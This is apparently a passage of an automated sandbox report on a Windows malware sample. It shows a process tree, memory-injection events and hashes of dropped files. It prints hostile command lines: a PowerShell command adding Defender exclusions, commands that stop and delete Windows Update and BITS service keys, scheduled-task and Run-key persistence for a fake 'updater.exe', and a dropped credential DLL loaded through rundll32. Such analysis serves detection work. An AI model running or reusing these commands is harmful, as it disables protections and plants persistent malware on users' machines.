4800 powershell.exe Token: SeIncBasePriorityPrivilege 4800 powershell.exe Token: SeCreatePagefilePrivilege 4800 powershell.exe Token: SeBackupPrivilege 4800 powershell.exe Token: SeRestorePrivilege 4800 powershell.exe Token: SeShutdownPrivilege 4800 powershell.exe Token: SeDebugPrivilege 4800 powershell.exe Token: SeSystemEnvironmentPrivilege 4800 powershell.exe Token: SeRemoteShutdownPrivilege 4800 powershell.exe Token: SeUndockPrivilege 4800 powershell.exe Token: SeManageVolumePrivilege 4800 powershell.exe Token: 33 4800 powershell.exe Token: 34 4800 powershell.exe Token: 35 4800 powershell.exe Token: 36 4800 powershell.exe Token: SeIncreaseQuotaPrivilege 4800 powershell.exe Token: SeSecurityPrivilege 4800 powershell.exe Token: SeTakeOwnershipPrivilege 4800 powershell.exe Token: SeLoadDriverPrivilege 4800 powershell.exe Token: SeSystemProfilePrivilege 4800 powershell.exe Token: SeSystemtimePrivilege 4800 powershell.exe Token: SeProfSingleProcessPrivilege 4800 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
rundll32.exepid process 3380 rundll32.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
Explorer.EXEpid process 2596 Explorer.EXE 2596 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
83baf716c50b90d398e1285d0c8c04c8.exePlayer3.exenbveek.exeddli.execmd.exebirges.exedescription pid process target process PID 984 wrote to memory of 1932 984 83baf716c50b90d398e1285d0c8c04c8.exe Player3.exe PID 984 wrote to memory of 1932 984 83baf716c50b90d398e1285d0c8c04c8.exe Player3.exe PID 984 wrote to memory of 1932 984 83baf716c50b90d398e1285d0c8c04c8.exe Player3.exe PID 984 wrote to memory of 804 984 83baf716c50b90d398e1285d0c8c04c8.exe pb1111.exe PID 984 wrote to memory of 804 984 83baf716c50b90d398e1285d0c8c04c8.exe pb1111.exe PID 984 wrote to memory of 3708 984 83baf716c50b90d398e1285d0c8c04c8.exe ddli.exe PID 984 wrote to memory of 3708 984 83baf716c50b90d398e1285d0c8c04c8.exe ddli.exe PID 984 wrote to memory of 3708 984 83baf716c50b90d398e1285d0c8c04c8.exe ddli.exe PID 1932 wrote to memory of 3984 1932 Player3.exe nbveek.exe PID 1932 wrote to memory of 3984 1932 Player3.exe nbveek.exe PID 1932 wrote to memory of 3984 1932 Player3.exe nbveek.exe PID 984 wrote to memory of 5004 984 83baf716c50b90d398e1285d0c8c04c8.exe birges.exe PID 984 wrote to memory of 5004 984 83baf716c50b90d398e1285d0c8c04c8.exe birges.exe PID 3984 wrote to memory of 1068 3984 nbveek.exe schtasks.exe PID 3984 wrote to memory of 1068 3984 nbveek.exe schtasks.exe PID 3984 wrote to memory of 1068 3984 nbveek.exe schtasks.exe PID 3984 wrote to memory of 4948 3984 nbveek.exe cmd.exe PID 3984 wrote to memory of 4948 3984 nbveek.exe cmd.exe PID 3984 wrote to memory of 4948 3984 nbveek.exe cmd.exe PID 3708 wrote to memory of 4528 3708 ddli.exe ddli.exe PID 3708 wrote to memory of 4528 3708 ddli.exe ddli.exe PID 3708 wrote to memory of 4528 3708 ddli.exe ddli.exe PID 4948 wrote to memory of 2300 4948 cmd.exe cmd.exe PID 4948 wrote to memory of 2300 4948 cmd.exe cmd.exe PID 4948 wrote to memory of 2300 4948 cmd.exe cmd.exe PID 4948 wrote to memory of 3380 4948 cmd.exe cacls.exe PID 4948 wrote to memory of 3380 4948 cmd.exe cacls.exe PID 4948 wrote to memory of 3380 4948 cmd.exe cacls.exe PID 4948 wrote to memory of 1796 4948 cmd.exe cacls.exe PID 4948 wrote to memory of 1796 4948 cmd.exe cacls.exe PID 4948 wrote to memory of 1796 4948 cmd.exe cacls.exe PID 4948 wrote to memory of 4732 4948 cmd.exe cmd.exe PID 4948 wrote to memory of 4732 4948 cmd.exe cmd.exe PID 4948 wrote to memory of 4732 4948 cmd.exe cmd.exe PID 4948 wrote to memory of 3172 4948 cmd.exe cacls.exe PID 4948 wrote to memory of 3172 4948 cmd.exe cacls.exe PID 4948 wrote to memory of 3172 4948 cmd.exe cacls.exe PID 5004 wrote to memory of 3808 5004 birges.exe ngentask.exe PID 5004 wrote to memory of 3808 5004 birges.exe ngentask.exe PID 4948 wrote to memory of 4612 4948 cmd.exe cacls.exe PID 4948 wrote to memory of 4612 4948 cmd.exe cacls.exe PID 4948 wrote to memory of 4612 4948 cmd.exe cacls.exe PID 5004 wrote to memory of 4580 5004 birges.exe EdmGen.exe PID 5004 wrote to memory of 4580 5004 birges.exe EdmGen.exe PID 5004 wrote to memory of 5084 5004 birges.exe aspnet_state.exe PID 5004 wrote to memory of 5084 5004 birges.exe aspnet_state.exe PID 5004 wrote to memory of 1760 5004 birges.exe aspnet_regsql.exe PID 5004 wrote to memory of 1760 5004 birges.exe aspnet_regsql.exe PID 5004 wrote to memory of 2492 5004 birges.exe cvtres.exe PID 5004 wrote to memory of 2492 5004 birges.exe cvtres.exe PID 5004 wrote to memory of 4432 5004 birges.exe mscorsvw.exe PID 5004 wrote to memory of 4432 5004 birges.exe mscorsvw.exe PID 5004 wrote to memory of 1856 5004 birges.exe SMSvcHost.exe PID 5004 wrote to memory of 1856 5004 birges.exe SMSvcHost.exe PID 5004 wrote to memory of 4376 5004 birges.exe AppLaunch.exe PID 5004 wrote to memory of 4376 5004 birges.exe AppLaunch.exe PID 5004 wrote to memory of 1872 5004 birges.exe Microsoft.Workflow.Compiler.exe PID 5004 wrote to memory of 1872 5004 birges.exe Microsoft.Workflow.Compiler.exe PID 5004 wrote to memory of 4992 5004 birges.exe MSBuild.exe PID 5004 wrote to memory of 4992 5004 birges.exe MSBuild.exe PID 5004 wrote to memory of 4456 5004 birges.exe AddInProcess.exe PID 5004 wrote to memory of 4456 5004 birges.exe AddInProcess.exe PID 5004 wrote to memory of 4420 5004 birges.exe DataSvcUtil.exe PID 5004 wrote to memory of 4420 5004 birges.exe DataSvcUtil.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\83baf716c50b90d398e1285d0c8c04c8.exe"C:\Users\Admin\AppData\Local\Temp\83baf716c50b90d398e1285d0c8c04c8.exe"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Player3.exe"C:\Users\Admin\AppData\Local\Temp\Player3.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe"C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe" /F5⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "Admin:N"&&CACLS "nbveek.exe" /P "Admin:R" /E&&echo Y|CACLS "..\16de06bfb4" /P "Admin:N"&&CACLS "..\16de06bfb4" /P "Admin:R" /E&&Exit5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"6⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "nbveek.exe" /P "Admin:N"6⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "nbveek.exe" /P "Admin:R" /E6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"6⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\16de06bfb4" /P "Admin:N"6⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\16de06bfb4" /P "Admin:R" /E6⤵
-
C:\Users\Admin\AppData\Local\Temp\1000089001\pb1111.exe"C:\Users\Admin\AppData\Local\Temp\1000089001\pb1111.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\1000090001\random.exe"C:\Users\Admin\AppData\Local\Temp\1000090001\random.exe"5⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\1000090001\random.exe"C:\Users\Admin\AppData\Local\Temp\1000090001\random.exe" -h6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\1000091001\XandETC.exe"C:\Users\Admin\AppData\Local\Temp\1000091001\XandETC.exe"5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Users\Admin\AppData\Local\Temp\1000092001\ChromeSetup.exe"C:\Users\Admin\AppData\Local\Temp\1000092001\ChromeSetup.exe"5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main5⤵
- Loads dropped DLL
-
C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main6⤵
- Loads dropped DLL
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2116 -s 6927⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\pb1111.exe"C:\Users\Admin\AppData\Local\Temp\pb1111.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\ddli.exe"C:\Users\Admin\AppData\Local\Temp\ddli.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\ddli.exe"C:\Users\Admin\AppData\Local\Temp\ddli.exe" -h4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\birges.exe"C:\Users\Admin\AppData\Local\Temp\birges.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\EdmGen.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\EdmGen.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regsql.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regsql.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\DataSvcUtil.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\DataSvcUtil.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WsatConfig.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WsatConfig.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\8D9A.exeC:\Users\Admin\AppData\Local\Temp\8D9A.exe2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe C:\Users\Admin\AppData\Local\Temp\Eorppuwwrieiyod.dll,start3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Checks processor information in registry
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61 237364⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 4003⤵
- Program crash
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }2⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn NoteUpdateTaskMachineQC3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe zuhwtyqtfkk2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe ozascextlcafxrlv 6E3sjfZq2rJQaxvLPmXgsH8HqLgRgcx0/LVDxBdghhCp2+hEkY7tykSHwITYgOlci3ytMC8bvXFdgLfubt31d00EGUNZvUBUebLdyQcn06lc9XyK+SQQg4bEvwPCdT2KYoSnyaznjkuq+t/WEmnCxetIZsxpO3p/zzwJI2q0v1rwbWjqgzbDndc3ETa3aKYf8EOpU9uqIUcKKIP5glSGIF5NNBIQIOxiwAszeRmTD+ssM2JwNB+ZJXRJvy123U7UEXSTx71FLoxpDYVaIMhOE++Mr3hazCz1q4t4s5o8+wL0kdpUV5VnrG7JmlnWotU5n89qBghGm+y6SMYnw4GovlYYIKPio/EJCBO4ISkMSM9oXvdK2xwDd7nOPHNI0ub2+9+yDpmbkJhXPRjLmh8EzH9no+cA8XXsDqc7l4Il6Q8HZCkxxQKp3X7QrvGtORgpsiUFRUsjuuqKF8OZDBQ643uz5XTg02QKOJfFPdU0JLRX+q6NZJdak+3EYZdI36Zgtv5L8IJAttmNYCJqIJTseVMH04bRJ5WBnXqRYehi2MM0O1YRQDI8kKVhBta2xSurnVpcEWelFYwmZuF8Vd3YhHb8yAOoY//KgjosTtbU5Co=2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4884 -s 6003⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4884 -ip 48841⤵
-
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exeC:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe1⤵
- Executes dropped EXE
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 832 -s 5723⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 832 -ip 8321⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 184 -p 2116 -ip 21161⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2564 -ip 25641⤵
-
C:\Program Files\Notepad\Chrome\updater.exe"C:\Program Files\Notepad\Chrome\updater.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
-
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exeC:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe1⤵
- Executes dropped EXE
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 01⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Google\Libs\g.logFilesize
226B
MD5fdba80d4081c28c65e32fff246dc46cb
SHA174f809dedd1fc46a3a63ac9904c80f0b817b3686
SHA256b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398
SHA512b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29
-
C:\Program Files\Notepad\Chrome\updater.exeFilesize
3.7MB
MD53006b49f3a30a80bb85074c279acc7df
SHA1728a7a867d13ad0034c29283939d94f0df6c19df
SHA256f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd
-
C:\Program Files\Notepad\Chrome\updater.exeFilesize
3.7MB
MD53006b49f3a30a80bb85074c279acc7df
SHA1728a7a867d13ad0034c29283939d94f0df6c19df
SHA256f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5440cb38dbee06645cc8b74d51f6e5f71
SHA1d7e61da91dc4502e9ae83281b88c1e48584edb7c
SHA2568ef7a682dfd99ff5b7e9de0e1be43f0016d68695a43c33c028af2635cc15ecfe
SHA5123aab19578535e6ba0f6beb5690c87d970292100704209d2dcebddcdd46c6bead27588ef5d98729bfd50606a54cc1edf608b3d15bef42c13b9982aaaf15de7fd6
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD5359d1e37a264703c99ebd01eed362de5
SHA1a1122c8bf9848b3371cd191ba540864204d1d845
SHA2565781f3046b0d978469415a059cf5ceae0e532869e69ab1dffb8ed878bd299b07
SHA512ce3caa1d2205be8167b7cd48ebf538a9ce8c148643c26a20377894aa15cf00f90b2b5e2ebf35d40a0273c088abc11fe6f010e34691d7fbc4bef8d7e482f5087d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5ba7cb450667ae5a5d0aa3c22fb67de4e
SHA19c79a1ba399162df82338195c90830d2cb2958c4
SHA2565f69208af4cb0214b67c4adf60890e7d9e01ee07d6365d511caf9938584d9ad0
SHA5126ddfb2ef606579c177d730b4d66671c4c66e19bf1a3faf485f34b5883d7319d1cf4e46d3f903a26732d6a9ce5c270e123fcf3085ec04000ec5a6d6d86a1a9404
-
C:\Users\Admin\AppData\Local\Temp\1000089001\pb1111.exeFilesize
3.5MB
MD517d8b23d0a991861f9a34ca2853bd267
SHA154325fa47d6423bef266ff925fdc22b65ae883cb
SHA25623b2cb63c39cad03761fa30d91e0d5a90df17aae5c3b7cbf3a2172d59824efe1
SHA5121c1fa7f991a5ab650c3279d56b9e1d3a77d623a568a15057c7b084f96e71e57047319a6a45e9f2e71767fadf8bf0bc647124b8b9ee03d9c63d250bd9f9c0764d
-
C:\Users\Admin\AppData\Local\Temp\1000089001\pb1111.exeFilesize
3.5MB
MD517d8b23d0a991861f9a34ca2853bd267
SHA154325fa47d6423bef266ff925fdc22b65ae883cb
SHA25623b2cb63c39cad03761fa30d91e0d5a90df17aae5c3b7cbf3a2172d59824efe1
SHA5121c1fa7f991a5ab650c3279d56b9e1d3a77d623a568a15057c7b084f96e71e57047319a6a45e9f2e71767fadf8bf0bc647124b8b9ee03d9c63d250bd9f9c0764d
-
